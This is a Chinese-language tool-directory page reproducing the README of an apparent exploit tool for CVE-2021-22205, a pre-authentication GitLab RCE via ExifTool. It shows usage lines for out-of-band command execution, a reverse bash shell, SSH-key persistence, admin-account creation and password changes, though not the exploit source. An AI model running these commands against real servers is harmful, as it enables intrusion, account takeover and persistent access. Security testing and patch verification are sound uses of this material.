Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-22205 — 使用 ExifTool 实现 GitLab CE/EE 认证前远程代码执行(RCE) | Kitploit
工具/GitHubGitHub/inspiringz/cve-2021-22205
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Archived
GitHubinspiringz/cve-2021-22205

CVE-2021-22205

使用 ExifTool 实现 GitLab CE/EE 认证前远程代码执行(RCE)

查看仓库
2374124年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-22205

GitLab CE/EE 预认证远程代码执行(利用ExifTool)

该项目仅供学习使用,如果侵犯了任何人的权益,请联系我删除该项目。最后,请勿非法使用。如果您在使用此工具的过程中有任何违法行为,您将自行承担所有后果。该工具的所有开发者和贡献者不承担任何法律及连带责任。

描述

在GitLab CE/EE中发现了一个问题,影响从11.9开始的所有版本。GitLab未能正确验证传递给文件解析器的图像文件,导致远程命令执行。

受影响版本:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

功能

  • 通过Webpack manifest.json中的哈希检测GitLab版本
  • 通过DNSLog和PostBin RequestBin自动进行带外交互
  • 支持反弹Bash Shell / 将SSH密钥附加到authorized_keys
  • 支持按回车键修改和恢复GitLab用户密码

使用

root@kitploit:~
🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via requestbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
  • site_url参数格式:http[s]://<domain|ip>[:port]/,例如:https://example.com:9000/
  • 标有*的方法(rce2,add)不稳定,可能无法使用 :(
  • 你可以根据实际环境修改脚本内容

截图

检测:

image-20220116233646585

RCE(通过RequestBin带外回显):

image-20220116234003576

反弹Bash Shell:

image-20211111131442470

将SSH密钥附加到authorized_keys:

image-20211111133555010

GitLab用户密码修改与恢复:

image-20211111132115090

参考

  • https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml
  • https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
  • https://github.com/righel/gitlab-version-nse
下载工具